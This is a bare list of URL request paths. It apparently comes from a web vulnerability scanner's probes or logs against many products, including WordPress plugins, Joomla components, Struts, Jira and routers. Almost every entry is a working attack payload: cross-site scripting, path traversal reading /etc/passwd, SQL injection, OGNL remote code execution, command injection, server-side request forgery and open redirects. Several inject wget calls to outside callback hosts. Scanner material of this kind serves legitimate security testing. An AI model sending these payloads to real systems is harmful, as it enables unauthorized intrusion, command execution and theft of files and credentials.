"/remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00",
"/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/RPC2_Login",
"/faces/javax.faces.resource/web.xml?loc=../WEB-INF",
"/index.php?page=/etc/passwd%00",
"/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/poc.jsp/",
"/wp-admin/admin.php/%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E/?page=under-construction",
"/remote/login?&err=--%3E%3Cscript%3Ealert('2A6Shokysp4lCVeJOuISTfH7Azm')%3C/script%3E%3C!--&lang=en",
"/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress",
"/?id=nuclei%25%7B128*128%7D",
"/zabbix/index_sso.php",
"/XmlPeek.aspx?dt=%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5CWindows%5C%5Cwin.ini&x=/validate.ashx?requri",
"/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd",
"/jars/upload",
"/index.php?page_slug=../../../../../etc/passwd%00",
"/?q=node&destination=node",
"/img.php?f=/./etc/./passwd",
"/openam/ui/PWResetUserValidation",
"/base/static/c:/windows/win.ini",
"/ssi/printenv.shtml?%3Cscript%3Ealert('xss')%3C/script%3E",
"/index.php?rest_route=/whm/v3/themesettings",
"/uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://cadgqm02toabu64p21o0ckqdiseynfcy4.interact.sh)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything",
"/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00",
"/wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/wp-content/uploads/wp-file-manager-pro/fm_backup/",
"/s/2A6ShsMcDmQV0cd8gIXvtJEjHtx/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml",
"/actuator/gateway/refresh",
"/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00",
"/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd",
"/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/assets/app/something/services/AppModule.class/",
"/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00",
"/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg",
"/apisix/batch-requests",
"/hub/",
"/wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=%22onmouseover%3Dalert(document.domain)%3B%2F%2F",
"/plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/phpmyadmin/",
"/example.com/%2F..",
"/cgi-bin/system_mgr.cgi?",
"/vendor/qcubed/qcubed/assets/php/profile.php",
"/services/pluginscript/",
"/include/findusers.php?token=%7B%7Btoken%7D%7D",
"/dashboard/uploadID.php",
"/printenv.shtml?%3Cscript%3Ealert('xss')%3C/script%3E",
"/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command",
"/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc",
"/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data",
"/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1",
"/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php",
"/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING",
"/menu/guiw?nsbrand=1&protocol=nonexistent.1337%22%3E&id=3&nsvpx=phpinfo",
"/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00",
"/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/_bulk",
"/_async/AsyncResponseService",
"/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)",
"/wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/os/mxperson",
"/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com",
"/pages/setup.php?defaultlanguage=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
"/%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://cadgqm02toabu64p21o0ckxb8gaygadxo.interact.sh%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://cadgqm02toabu64p21o0ckxb8gaygadxo.interact.sh%7D;?%7B%7Brepeat(%22A%22,",
"/KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/artifactory/ui/auth/login?_spring_security_remember_me=false",
"/ui_base/js/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
"/pme/database/pme/phinx.yml",
"/public/login.htm?type=probes",
"/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00",
"/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains",
"/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00",
"/cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd",
"/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00",
"/index.php?option=com_imagebrowser&folder=../../../../etc/passwd",
"/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1",
"/axis2-admin/login",
"/addons/phpmailer/phpmailer.php",
"/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2F%5Cexample.com",
"/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0Acat%20/etc/passwd%0A'&PW=",
"/%5C../ssl/yaws-key.pem",
"/wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option",
"/Side.php",
"/secure/ManageFilters.jspa?filter=popular&filterView=popular",
"/assets/_core/php/profile.php",
"/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd",
"/echo-server.html?code=test&state=http://www.attacker.com",
"/wp-content/plugins/quiz-master-next/README.md",
"/login.htm",
"/wp-json/wp/v2/lesson/1",
"/SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei",
"/query/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/all",
"/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00",
"/wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc",
"/?url=http://0177.0.0.1/server-status",
"/images/..%2Fcgi/cgi_i_filter.js?_tn=%7B%7Btrimprefix(base64_decode(httoken),",
"/include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt",
"/man.cgi?redirect=setting.htm%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY",
"/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22",
"/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00",
"/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/lucee/admin/imgProcess.cfm?file=/../../../context/2A6Shtr4a9fcLliFOzxU3XTS91i.cfm",
"/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00",
"/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00",
"/variable/varimport",
"/meta",
"/index.php?option=com_contenthistory&view=history&list%5Bordering%5D=&item_id=1&type_id=1&list%5Bselect%5D=updatexml(0x23,concat(1,md5(8888)),1)",
"/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode'%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0",
"/pages/doenterpagevariables.action",
"/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ==",
"/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/osm/REGISTER.cmd",
"/functionRouter",
"/javax.faces.resource/dynamiccontent.properties.xhtml",
"/adserve/www/delivery/lg.php?dest=http://example.com",
"/cgi-bin/login.cgi",
"/?ajax-request=jnews",
"/checkValid",
"/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd",
"/api/snapshots",
"/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd",
"/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd",
"/cas/v1/tickets/",
"/wp-admin/admin-ajax.php?action=moove_read_xml",
"/wp-admin/admin.php?page=download_report&report=users&status=all",
"/visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&end=500&match",
"/password.jsn",
"/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C'%2Balert(1)%2C%2F%2F",
"/.../.../.../.../.../.../.../.../.../etc/passwd",
"/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd",
"/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/xmlpserver/ReportTemplateService.xls",
"/module/ph_simpleblog/list?sb_category=')%20OR%20true--%20-",
"/?action=command&command=set_city_timezone&value=$(wget%20http://cadgqm02toabu64p21o0cktfmzaytcqar.interact.sh))",
"/magmi/web/magmi_saveprofile.php",
"/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828",
"/wiki/pages/createpage-entervariables.action?SpaceKey=x",
"/te%3Cimg%20src=x%20onerror=alert(42)%3Est",
"/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php",
"/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd",
"/index.php?sl=../../../../../../../etc/passwd%00",
"/OpenAM-11.0.0/ui/PWResetUserValidation",
"/admin/queues.jsp?QueueFilter=yu1ey%22%3E%3Cscript%3Ealert(%221%22)%3C%2Fscript%3Eqb68",
"/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00",
"/2A6ShxmdxEvyNHeEmBGpxhGreW3?cmd=id",
"/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%22&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E",
"/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow",
"/signEzUI/playlist/edit/upload/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F../etc/passwd",
"/wp-content/plugins/canto/includes/lib/get.php?subdomain=cadgqm02toabu64p21o0ckp95roybtiyn.interact.sh",
"/html/log",
"/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download",
"/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00",
"/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00",
"/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&msg=imported",
"/revive/www/delivery/lg.php?dest=http://example.com",
"/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://",
"/newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert(2A6ShuQYcR9ha3Ad7GGdkDAGP8O)%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY",
"/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd",
"/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00",
"/wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert(document.domain)%3E",
"/api/experimental/dags/example_trigger_target_dag/dag_runs/%7B%7Bexec_date%7D%7D/tasks/bash_task",
"/downloads/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd",
"/%252f%255cexample.com%252fa%253fb/",
"/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd",
"/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net",
"/.%0D./.%0D./.%0D./.%0D./bin/sh",
"/static?/%2557EB-INF/web.xml",
"/server/",
"/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://cadgqm02toabu64p21o0ckx1jhyyecrwa.interact.sh/",
"/..../..../..../..../..../..../..../..../..../windows/win.ini",
"/actions/authenticate.php",
"/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=..%2F..%2F..%2F../wp-config.php",
"/?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/external_content/retrieve/oembed?endpoint=http://cadgqm02toabu64p21o0ckqn3hayb97mn.interact.sh&url=foo",
"/search.php?search=%22;wget+http%3A%2F%2Fcadgqm02toabu64p21o0ckpt36yyyqube.interact.sh';%22",
"/cgi?2",
"/admin/index.php?p=ajax-ops&op=elfinder",
"/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st",
"/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1",
"/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E",
"/verify.php?id=1&confirm_hash=",
"/cgi?7",
"/solr/%7B%7Bcore%7D%7D/config",
"/analytics/telemetry/ph/api/hyper/send?_c&_i=test",
"/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files%5B%5D=/etc/passwd",
"/ajax/api/content_infraction/getIndexableContent",
"/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/lui/",
"/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00",
"/apply_sec.cgi",
"/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1",
"/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/_search",
"/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00",
"/wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx%3Cimg%20src=x%20onerror=alert(document.domain)%3E",
"/wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E",
"/new/newhttp://example.com",
"/Config/SaveUploadedHotspotLogoFile",
"/objects/nuclei.txt",
"/help/english/index.html?javascript&",
"/plugins/web/service/search/auto-completion/domain/en.xml?q=adm",
"/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C",
"/actions/seomatic/meta-container/meta-link-container/?uri=%7B%7B228*'98'%7D%7D",
"/appGet.cgi?hook=get_cfg_clientlist()",
"/ucmdb-api/connect",
"/api/geojson?url=file:///etc/passwd",
"/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152",
"/cgi-bin/supportInstaller",
"/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd",
"/en/php/usb_sync.php",
"/module/?module='onm%3Ca%3Eouseover=alert(document.domain)'%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url=https://ultimatebingoverifier.appspot.com",
"/_ignition/execute-solution",
"/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax",
"/tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2Fcadgqm02toabu64p21o0ckoky6yym98cc.interact.sh%60",
"/wp-admin/admin.php?page=mlw_quiz_list&s=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&paged=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C",
"/admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=2A6Shpy69LRE7nGc296RISOqyiR.php&target=l1_Lw",
"/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo",
"/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com",
"/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00",
"/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00",
"/calendar_form.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/test.php",
"/download/index.php?file=../../../../../../../../../etc/passwd",
"/aj.html?a=devi",
"/cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq';%7D%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00",
"/login.action?redirectAction:$%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B'sh','-c','id'%7D)).start(),%23b%3D%23a.getInputStream(),%23c%3Dnew%20java.io.InputStreamReader(%23b),%23d%3Dnew%20java.io.BufferedReader(%23c),%23e%3Dnew%20char%5B50000%5D,%23d.read(%23e),%23matt%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D",
"/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/?p=1",
"/?file=http://0177.0.0.1/etc/passwd",
"/api/users/search_authors",
"/tools/sourceViewer/index.html?filename=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
"/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00",
"/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Ca+href=%22/*%22%3E*/)%7D);function+__MobileAppList()%7Balert(1)%7D//%3E",
"/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/",
"/?location=search",
"/pages/createpage-entervariables.action",
"/$%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue,%23a%3D@java.lang.Runtime@getRuntime().exec('cat%20/etc/passwd').getInputStream(),%23b%3Dnew%20java.io.InputStreamReader(%23a),%23c%3Dnew%20%20java.io.BufferedReader(%23b),%23d%3Dnew%20char%5B51020%5D,%23c.read(%23d),%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23sbtest.println(%23d),%23sbtest.close())%7D/actionChain1.action",
"/__",
"/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E",
"/debug/pprof/",
"/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm",
"/objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png",
"/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00",
"/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd",
"/embed.js",
"/cache/backup/",
"/product-downloads/2A6Shpy69LRE7nGc296RISOqyiR.php",
"/graph_realtime.php?action=init",
"/assets/data/usrimg/2a6shrldmmlw2sccgtt4aznqm68.php",
"/viewlog.jsp",
"/action.php",
"/webadmin/pkg?command=%3Cscript%3Ealert(document.cookie)%3C/script%3E",
"/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd",
"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license",
"/wp-admin/admin.php?page=wow-company&tab=http://cadgqm02toabu64p21o0ckq993oygttpc.interact.sh/",
"/solr/%7B%7Bcore%7D%7D/replication/?command=fetchindex&masterUrl=https://example.com",
"/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd",
"/index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D",
"/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd",
"/fw.progrss.details.php?popup=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
"/s/2A6Shr1P7pElwh4RumRAZq6rOlW/_/;/WEB-INF/web.xml",
"/cgi-bin/;cat$IFS/etc/passwd",
"/api/experimental/dags/example_trigger_target_dag/paused/false",
"/cgi-bin/slogin/login.py",
"/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::",
"/lab.html?vpath=//example.com",
"/mantisBT/verify.php?id=1&confirm_hash=",
"/oam/server/opensso/sessionservice",
"/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://example.com",
"/adserver/www/delivery/lg.php?dest=http://example.com",
"/index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D",
"/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com",
"/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1",
"/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&what=x&where=BODY&submit=Search",
"/mgmt/shared/authn/login",
"/api.php",
"/cgi-bin/logoff.cgi",
"/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1",
"/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename'%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
"/owa/auth/x.js",
"/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/goform/setmac",
"/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1%22%20onmouseover=alert(document.domain)//",
"/+CSCOE+/session_password.html",
"/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData",
"/?key='%3E%22%3Csvg%2Fonload=confirm('xss')%3E",
"/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users",
